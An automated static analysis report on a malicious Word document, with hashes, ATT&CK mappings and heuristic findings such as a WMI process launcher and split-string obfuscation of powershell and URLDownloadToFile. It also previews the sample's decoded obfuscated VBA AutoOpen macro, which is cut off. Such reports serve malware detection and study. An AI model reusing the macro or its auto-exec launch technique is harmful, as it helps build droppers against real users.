Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f9c03067070ea111…

MALICIOUS

Office (OLE)

223.5 KB Created: 2019-04-15 06:56:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: a0551eb320025285ec83941339247b02 SHA-1: 3dda82bf566967950fb757a432fe594590616e75 SHA-256: f9c03067070ea11198cd749c78be77c6fb75dc108662309da82beeeb5592cf70
302 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1218.011 System Binary Proxy Execution: Rundll32

The sample is a malicious Office document containing obfuscated VBA macros. The macros utilize GetObject and CreateObject to interact with WMI (winmgmts:) to launch a process, indicating an attempt to execute arbitrary code. This is a common technique for downloading and executing further stages of malware.

Heuristics 8

  • ClamAV: Doc.Downloader.00536d-6940733-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.00536d-6940733-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 58498 bytes
SHA-256: db36abe1943a4bf486d2fc51b751fef306f467e48cef52edfd451ac49ff8a292
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "VDBGABcZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AAAUXQcA"
Attribute VB_Base = "0{41B80301-4F30-4DFF-9E13-FF01FAAE48FC}{D3CACD97-8909-4E1C-A8B5-B5BB877E6850}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UAC4AA"
Attribute VB_Base = "0{189A0FF8-4D96-4B19-97D3-01F9E2211D01}{F88DC55B-ECC5-41AE-8FAD-B6A803EAC6A8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "hAAAQA"
Sub autoopen()
   If CABxZA = zZQXZADA Then
      Select Case KAAU4x_D
         Case 824423980
            JGQxCX11 = 541953637
            B1_AQAA = ZBkw4cDU
            WAACAAw = Asc(197431235 + Log(566296674 - Rnd(SAoAQC)) / 230159009 + Oct(361161562))
         Case 260274818
            iQDABA = rBQcGQkD
            bQw4UkG = rxkDABA
            dXwAA4U = CDate(507087702 - Cos(582724791 * Rnd(930168264) + 184544308 * 198050860) * dAAXAAA / Round(240484163))
         Case 954027194
            dAUwZkQ1 = YXAA4oXQ
            OAABAQ = CStr(687146031)
            dAwAAw = Atn(693080714 + Atn(8532107) * qAoAAD * CDate(WAA4Uw + 36 + UZAQCA_ / CStr(XA14ZA)))
      End Select
End If
   If UAZw4Z = PAAkUwU Then
      Select Case MGAA_4wU
         Case 662399757
            fADAAAA = 886185252
            fA4DQ4B = AUQAAxD
            m1ACxUxZ = Asc(561466704 + Log(82608497 - Rnd(uQAAAxA)) / 80918609 + Oct(687553194))
         Case 998728333
            O_AAcAwA = HZAGAAA
            nACko4 = zAQAAo
            bBCZkBAA = CDate(507539159 - Cos(383013148 * Rnd(424800738) + 346047071 * 961173696) * BUCAUAD1 / Round(466825800))
         Case 324182574
            o4AU4A = SDQAAA
            ZX1A4AQ = CStr(839175312)
            jDXAZX = Atn(957733703 + Atn(592807201) * ScA4c1Z * CDate(BAcAAQ1 + 36 + icB14DAA / CStr(f4cA1A)))
      End Select
End If
   If NABA4GXQ = DADAUBAA Then
      Select Case vAQAXA
         Case 811608193
            SUAZBDA = 203267347
            XDUAGACx = iABGcxkA
            XBcXAUAw = Asc(252737846 + Log(853717231 - Rnd(lAAAwAk)) / 702600719 + Oct(252830482))
         Case 112938340
            wDQAQBC = ZQ4DZo1X
            iUxQGABA = rGAZQA
            vUAoccw4 = CDate(736973785 - Cos(45942889 * Rnd(723496360) + 936787964 * 841547363) * RQAAQBA / Round(680824439))
         Case 38404462
            rAwkQwQA = SUUxAA
            DD1AAcUA = CStr(349544721)
            zxDwDAAU = Atn(626779698 + Atn(494500476) * VwZcAxA * CDate(QoCA4ZAw + 36 + tAA1ccZA / CStr(hc1BCoDA)))
      End Select
End If
fACBDG4A
   If BCAZAG = uCX1BG4Q Then
      Select Case aBA4oAAA
         Case 237027961
            J1AcAAU = 725651001
            JAUBBUkB = iAA4DxAD
            bADUUAA = Asc(297422216 + Log(719513665 - Rnd(pAxABA)) / 744389716 + Oct(303320506))
         Case 438840034
            DAxAAQ = z1ACAA
            GAABBC = Jw1Q1UQG
            TBUABZG = CDate(601632226 - Cos(233712794 * Rnd(916568828) + 167053570 * 107627104) * JUAUkCw / Round(126606403))
         Case 668598851
            qADB1ZcA = pAAAAAw
            jDAUABD = CStr(408859490)
            LAXAAQAB = Atn(764118703 + Atn(937464247) * wAXUA1 * CDate(qcAxBA + 36 + oAwDADA / CStr(YABBB_Q)))
      End Select
End If
   If wGBkAX = uQQUXUAA Then
      Select Case wAAB4wAQ
         Case 294513077
            aA_Q4B = 479579391
            iABUBA = GAACZkAA
            DAUGoXB = Asc(375555191 + Log(615128457 - Rnd(iBcCAk)) / 337159818 + Oct(867101891))
         Case 561078452
            iAAwAwxA = qZA4DA
 
... (truncated)